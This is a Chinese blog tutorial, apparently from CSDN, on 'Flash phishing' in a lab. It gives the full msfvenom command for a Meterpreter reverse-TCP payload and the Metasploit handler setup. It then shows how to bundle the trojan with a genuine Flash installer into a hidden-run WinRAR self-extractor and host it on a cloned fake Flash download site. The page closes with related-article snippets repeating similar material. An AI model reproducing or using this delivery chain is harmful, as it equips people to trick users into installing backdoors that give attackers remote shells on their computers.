xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!

最新推荐文章于 2024-07-23 22:58:33 发布
最新推荐文章于 2024-07-23 22:58:33 发布
阅读量1.5k 收藏 18
点赞数 34
文章标签: xss linux 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/140645113
版权

目录

主要环境准备:

整体思路:

详细步骤:

1.在kali中利用MSF生成一个PayLoad

2.kali中开启监听

3.伪装木马

(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp

(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...

(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

4.搭建flash的网站并修改其下载文件

5.去搭建的网站下载我们的木马并运行

主要环境准备:

kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)

整体思路:

详细步骤:

1.在kali中利用MSF生成一个PayLoad

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.252.129 LPORT=44
44 -f exe > shell.exe
//192.168.252.129 是你kali监听设备的ip地址 端口我选择的4444

  • msfvenom: 这是Metasploit框架中的一个工具,用于生成各种类型的payloads。

  • -p: 这个选项用来指定payload类型。在这里,payload类型为windows/x64/meterpreter/reverse_tcp,表示生成的是针对x64架构的Windows系统、使用Meterpreter功能的、通过反向TCP连接回连到攻击者的payload。

  • LHOST=192.168.252.129: 这个参数指定了监听主机的IP地址,payload生成的shellcode将回连到这个IP地址。

  • LPORT=4444: 这个参数指定了监听端口,payload生成的shellcode将尝试在这个端口上建立连接。

  • -f exe: 这个参数指定了输出格式,这里设置为exe,意味着生成的payload将是一个Windows可执行文件。

  • >shell.exe: 这表示输出文件名,msfvenom生成的payload将被保存为名为shell.exe的文件。

运行完会在当前目录下生成一个shell.exe 文件 然后将其拖到你的物理机上 进行后续的伪装捆绑

2.kali中开启监听

上一步我们生成了一个可执行木马 现在我们要在kali 中开启该木马的监听 

在kali 中依次输入以下语句 

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.252.129
set lport 4444
run

  • msfconsole: 这是启动Metasploit控制台的命令,从这里你可以执行各种渗透测试和安全评估任务。

  • use exploit/multi/handler: 这条命令选择了exploit/multi/handler模块,这是一个通用的监听器模块,可以用来接收任何类型的payload发送的连接请求。

  • set payload windows/x64/meterpreter/reverse_tcp: 这里设置了payload类型为windows/x64/meterpreter/reverse_tcp,这意味着你期望接收到由这种类型payload生成的连接。

  • set lhost 192.168.252.129: 设置监听的IP地址为192.168.252.129,这是你的机器或服务器的本地IP地址,payload将回连到这个地址。

  • set lport 4444: 设置监听的端口号为4444,payload将尝试在这个端口上建立连接。

  • run: 最后运行这个配置好的监听器,开始等待payload的连接。

显示如下就是进入了监听等待连接界面

3.伪装木马

因为我们要将木马伪装到flash的解压包中 所以我们先去flash下载一个真的flash安装包 下载链接在下面 

https://www.flash.cn/download-wins
下载完后我们就有两个文件 一个木马文件一个真的安装包

我们利用winRAR的自定义解压将两个文件合成一个可执行文件

(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp

(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...

(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

然后我们就得到了两个文件合一起的可执行文件 

4.搭建flash的网站并修改其下载文件

下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问

https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash

我们将源码文件部署在网站的WWW根目录下

然后查看了index.html文件中的下载路径 发现其文件名 为了方便我们将我们的木马文件改成他的原本的文件名字 再将其原本正确的文件删掉 就是替换了他正确的下载文件

修改后的样子:

5.去搭建的网站下载我们的木马并运行

记得先运行我们下载搭建好的flash网站

因为搭建在网站根目录下 所以我直接访问了本机

点击下载就会下载咱们的木马文件了

下载下来点击运行 返回kali监听机就会发现目标机已上线 并且可以执行目标电脑的shell 

A 八方
关注
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6703
XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 550
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xss和csrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
实验27:xss钓鱼演示
qq_44720671的博客
04-18 981
实验思路: 我们会用basic认证来做一个钓鱼的场景 我们可以在存在着xss漏洞的页面里面嵌入一个请求,当用户打开这个嵌入了恶意代码的页面,用户的页面就会弹出图中的登陆框,如果用户的安全意识不太够,那么就会把账号和密码发送到我们的pkxs后台 我们在pikachu的储存型XSS上来做演示,输入这个payload 点提交后 因为他是个存储型xss,所以我们的留言板里已经留下了,所以我们刷新一下...
XSS钓鱼某网约车后台一探究竟,乘客隐私暴露引发思考
dfdhxb995397的博客
05-16 255
i春秋作家:onls辜釉 最近的某顺风车命案,把网约车平台推上了风口浪尖,也将隐私信息管理、审查的讨论面进一步扩大。这让我不禁联想起自己今年春节的遭遇,当时公司放假准备回家过年,我妈给我推荐了一个在我们那十八线小城当时正搞活动的网约车平台,从市火车站到县里原本100+的车费,平台新用户只需1元。是个没听过的平台本有点不放心,不过抱着尝试新鲜事物(穷)的心态还是下载注册了试试,但出...
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2881
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
Flash水坑钓鱼
god_Zeo的安全博客
02-06 6048
Flash水坑钓鱼起因准备先配置一个马子吧自解压捆绑文件的利用上传到服务器常见用法 起因 在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。 未雨绸缪,先测试一下,以后肯定用的到 准备 flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn 一个服务器 一个域名 一个马子 先配置一个马子吧 使用常用的CS吧,随便来一个,成功上线 关于...
TopFlash钓鱼
小小猪的博客
12-30 366
TopFlash钓鱼 简介: 通过下载flash进行钓鱼 复现: 打开Yihsiwei.js修改为自己的服务器地址,越真实越好 打开服务 受害者进行网址访问,点击确定 进行下载 下载成功,这个exe自己换成免杀的可执行程序,不然会被杀掉 受害者点击之后cs上线 ...
xss挑战(详细小白
weixin_64655821的博客
09-22 1394
xss挑战前十关
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 4241
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
flash动画小猫钓鱼
03-31
一个动画一个动画一个动画一个动画一个动画
Flash钓鱼讲解
内心不种满鲜花就会长满杂草
05-31 1004
flash钓鱼
攻防演练 | Flash钓鱼手法分享
2301_80115097的博客
06-11 873
前几天看了一篇土司的实战文章,操作骚的一批,而且师傅把钓鱼源码传到了github上我拿过来研究一下免杀钓鱼的手法百试不爽,很多情况下比0day要好用很多,尤其是针对目标网站实在是没有什么可利用的漏洞的时候。我们本次设想的环境是能够找到xss,这个漏洞不难找的,很多大厂也无法避免这种漏洞,骚就骚在怎么利用这个漏洞将我们的木马加以隐藏,因为正常情况下一个跟你不是很熟的人很难点我们直接发过去的马,即便是做过伪装的。
Flash钓鱼
热门推荐
weixin_45794666的博客
02-22 2万+
Flash钓鱼 首先将写好的flash.js放在自己的服务器上 var s1 = document.createElement('script'); s1.setAttribute('type','text/javascript'); s1.setAttribute('src','//cdn.bootcdn.net/ajax/libs/jquery/2.0.0/jquery.min.js'); var head = document.getElementsByTagName('head')[0]; head
XSS-Flash攻击钓⻥
最新发布
2401_85783544的博客
07-23 383
进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。
Xss——Flash钓鱼
weixin_56291508的博客
04-22 762
Xss——Flash钓鱼
Pikachu——Xss钓鱼
m0_60767986的博客
04-23 8011
前端js代码限制输入框只能提交20个字段,将它修改为100即可(当然,这是get型xss,可以直接在url传参处添加攻击语句)提交攻击语句后发现,跳转回了靶场首页,网页debug发现:第一:请求了指定的钓鱼页面的url,并在后面携带了我的cookie信息第二:跳转回靶场首页(前面“靶场cookie获取的额外操作”的结果,用来抵消受害者的怀疑)
xss实现钓鱼操作
weixin_38168786的博客
01-29 1360
自己写一个和原网站后台登录地址一模一样的钓鱼页面JS加载一个iframe 100%覆盖原网页 提示登录时重新登录 因为是iframe加载 url地址不变 钓鱼成功后 再跳转回/admin/index.php 因为目标session没过期 所以可以极大程度的模拟正常的登录成功操作。 注入如下代码: 1 setTimeout(function(){ 2 parent.docum...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值